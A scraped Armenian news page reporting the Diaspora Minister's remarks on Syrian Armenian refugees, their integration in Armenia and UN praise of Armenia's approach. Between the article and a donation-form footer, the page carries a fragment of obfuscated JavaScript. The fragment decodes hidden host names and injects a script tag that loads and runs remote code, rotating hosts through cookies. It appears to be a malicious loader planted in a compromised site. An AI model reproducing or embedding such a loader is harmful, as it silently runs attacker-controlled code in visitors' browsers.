News

09
Jun

ՄԱԿ-ը ՀՀ-ի` Փախստականներու Հետ Աշխատելու Օրինակը Դարձուցած Է Մոտելային. Հրանոյշ Յակոբեան

hranoush

ՀՀ Սփիւռքի նախարար Հրանոյշ Յակոբեան Tert.am-ի հետ զրոյցի ընթացքին ըսած է, որ 3-4 ամիս առաջ սուրիահայերու դէպի Գանատա մեկնելու աշխուժութիւնը արդէն մարած է: Ան նշած է, որ եղած են մարդիկ, որոնք ունեցած են ընտանիքներու միաւորման խնդիր եւ ատոր համար մեկնած են:

«Սակայն եղան նաեւ մարդիկ, որոնք ուրախացան Գանատա մեկնելու համար, որովհետեւ հեշտացուեց վիզայի խնդիրը, սակայն տեղ հասնելուց յետոյ տեսան, որ որեւէ հնարաւորութիւն, արտօնութիւն չկայ իրենց կեանքը հանգիստ դասաւորելու համար, ինչը կայ Հայաստանում»,- ըսած է նախարարը եւ նշած, որ որքան տեղեակ է այդ հոսքը մարած է եւ այսօր գացողներուն թիւը այնպէս չէ, որ կրնայ անհանգստացնել:

Ան տեղեկացուցած է, որ ընդհանուր առմամբ Հայաստան ժամանած է մօտաւորապէս 20 հազար սուրիահայ, սակայն Հայաստանի մէջ հաստատուած է 17 հազարը, իսկ 3 հազարը միշտ շարժման մէջ կ’ըլլայ: «Այսօր էլ սիրիական խնդրի դժուարութիւնները ստիպում են, որ շատերը գան Հայաստան, եւ նոր տեղափոխուողներ եւս կան»,- ըսած է ան:

Սփիւռքի նախարարը ըսած է, որ Հայաստան տեղափոխուած սուրիահայերը համոզուած են, որ իրենց հարեւան արաբներու վիճակը շատ ծանր է, անոնք ճամբարին մէջ են եւ օրական կը ստանան մէկ տոլարէն պակաս գումար։ «Սիրիայից դուրս եկած փախստականների վիճակն անտանելի է, երկու միլիոնից աւելի փախստականներ այսօր կիսասոված են, խեղդւում են ծովում, գտնւում են ծանր վիճակում, այնպէս որ մեր հայրենակիցները իրենց համեմատում են իրենց հարեւանների հետ, որոնց հետ լաւագոյն ձեւով ապրում էին Սիրիայում»,- ըսած է ան:

Հրանոյշ Յակոբեանը ըսած է, որ սուրիահայերը կ՝ապրին ՀՀ քաղաքացիներուն հաւասար պայմաններու մէջ, կ’աշխատին: «Հայաստան պետութիւնը արել է բոլոր հնարաւորը, եւ ՄԱԿ-ը այսօր Հայաստանի օրինակը դարձրել է մոտելային եւ ուզում է տարածել միւս երկրներում, թէ ինչպէս փախստականների հետ աշխատեն: Միւս երկրներում փախստականները համարւում են բացասական երեւոյթ, մեր երկրում` դրական, որովհետեւ նրանք մասնակցում են երկրի տնտեսական, սոցիալական կեանքի զարգացմանը»,- ըսած է ան:

Անդրադառնալով ընդելուզման խնդիրներուն՝ նախարար Յակոբեան ըսած է, որ կրթական, առողջապահական, հսարակական ապահովութեան ոլորտներուն մէջ անիկա ամբողջութեամբ աւարտած է: «Անցնող հինգ տարիների ընթացքում 13 հազար սիրիահայ դարձել է ՀՀ քաղաքացի եւ 1800-ը կացութեան կարգավիճակ է ձեռք բերել, ինչը խօսում է ինտէգրման ցուցանիշի մասին»,- ըսած է ան:

Սփիւռքի նախարարը ըսած է, որ տնտեսական ընդելուզման խնդիրները դեռ կը շարունակուին, որովհետեւ բոլորը չեն, որ գործ գտած են կամ իրենց կատարած աշխատանքը իրենց հաճելի է, եւ այդ խնդիրները ունին նաեւ հայաստանեան գործարարները:

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "yerakouyn.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

Source: Yerakouyn

You are donating to : Greennature Foundation

How much would you like to donate?
$10 $20 $30
Would you like to make regular donations? I would like to make donation(s)
How many times would you like this to recur? (including this payment) *
Name *
Last Name *
Email *
Phone
Address
Additional Note
paypalstripe
Loading...